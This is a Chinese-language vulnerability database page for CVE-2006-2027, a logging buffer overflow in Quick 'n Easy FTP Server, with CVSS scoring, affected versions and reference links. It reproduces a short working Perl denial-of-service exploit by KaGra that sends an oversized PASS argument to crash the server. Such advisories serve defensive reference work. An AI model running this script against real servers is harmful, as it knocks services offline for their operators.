CVE-2006-2027
CVSS6.5
发布时间 :2006-04-25 20:06:00
修订时间 :2008-09-05 17:03:28
NMCOE    

[原文]Buffer overflow in Unicode processing in the logging functionality in Pablo Software Solutions Quick 'n Easy FTP Server Professional and Lite, probably 3.0, allows remote authenticated users to execute arbitrary code by sending a command with a long argument, which triggers a buffer overflow when an admin selects the Logging section in the FTP server main window. NOTE: the original researcher claims that the vendor disputes this issue.


[CNNVD]Pablo Software Solutions Quick 'n Easy FTP Server 记录缓冲区溢出漏洞 (CNNVD-200604-467)

        BPablo Software Solutions Quick 'n Easy FTP Server专业版和精简版,大概是3.0版本,其日志功能的Unicode字符处理存在缓冲区溢出。这使得远程认证用户可以通过发送具有长参数的命令执行任意代码;当管理员在FTP服务器主窗口中选择"日志"选项时,上述命令触发缓冲区溢出注:最初的调查者称,厂商对此问题持有争议。

- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:pablo_software_solutions:quick_n_easy_ftp_server:3.0::lite
cpe:/a:pablo_software_solutions:quick_n_easy_ftp_server:3.0::professional

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2027
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2027
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-467
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/431920/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060424 Quick 'n Easy FTP Server pro/lite Logging unicode stack overflow
http://www.securityfocus.com/bid/17681
(UNKNOWN)  BID  17681
http://www.osvdb.org/25235
(UNKNOWN)  OSVDB  25235
http://securityreason.com/securityalert/788
(UNKNOWN)  SREASON  788

- 漏洞信息

Pablo Software Solutions Quick 'n Easy FTP Server 记录缓冲区溢出漏洞
中危 缓冲区溢出
2006-04-25 00:00:00 2006-04-27 00:00:00
远程  
        BPablo Software Solutions Quick 'n Easy FTP Server专业版和精简版,大概是3.0版本,其日志功能的Unicode字符处理存在缓冲区溢出。这使得远程认证用户可以通过发送具有长参数的命令执行任意代码;当管理员在FTP服务器主窗口中选择"日志"选项时,上述命令触发缓冲区溢出注:最初的调查者称,厂商对此问题持有争议。

- 公告与补丁

        暂无数据

- 漏洞信息 (593)

Quick 'n EasY VER 2.4 Ftp Server remote D.o.S (EDBID:593)
windows dos
2004-10-24 Verified
0 KaGra
N/A [点击下载]
#!/usr/local/bin/perl -w

###########################################################
###########################################################
##   Quick 'n EasY VER 2.4 Ftp Server remote D.o.S
##         Discovered,exploited by KaGra
##	Tested on WinXP SP1 English version
## sENDING a big buffer in PASS,at least 1041 bytes	
## will crash the sever,as long as the logfile on server
## is viewed or just at the time it will be viewed.This
## sploit works also for almost ALL commands (like APPE
## ,CWD etc),but as u understand,for them U should have at
## least a guest account.For this sploit,no account needed.
## PS:Many thankz to muts for the shellcode at Ability Server APPE sploit...
############################################################
############################################################


use Net::FTP;


$hostname = 'localhost'; 		#Remote Host to D.o.S!
$username = 'anonymous'; 		#AnythinG HeRe!

print "\n[*]BuiLDinG BuFfer...\n";

$password = 'A'x1041   ; 		#OverFlow BuffEr!
print "[*]ConnectinG To TarGet...\n";

$ftp = Net::FTP->new($hostname);        # Connecting...
print "[*]SenDing DeViL...\n\n";

$ftp->login($username, $password);      # Send EviL BuffeR...

$ftp->quit;
print "SerVer Has Been Dosed,will be Down if  LogFile is or will be viewed!\n";


# milw0rm.com [2004-10-24]
		

- 漏洞信息

25235
Quick 'n Easy FTP Server Log Viewing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow may exist in Quick 'n Easy FTP Server. The product fails to perform boundary checks when viewing log data resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-04-24 2006-03-26
2006-04-24 Unknow

- 解决方案

The vendor states the vulnerability does not exist, but the author of the advisory insists it does. Versions 2.7.1 and higher have been released since the advisory; it is not known whether they fix this vulnerability. There are no reported workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站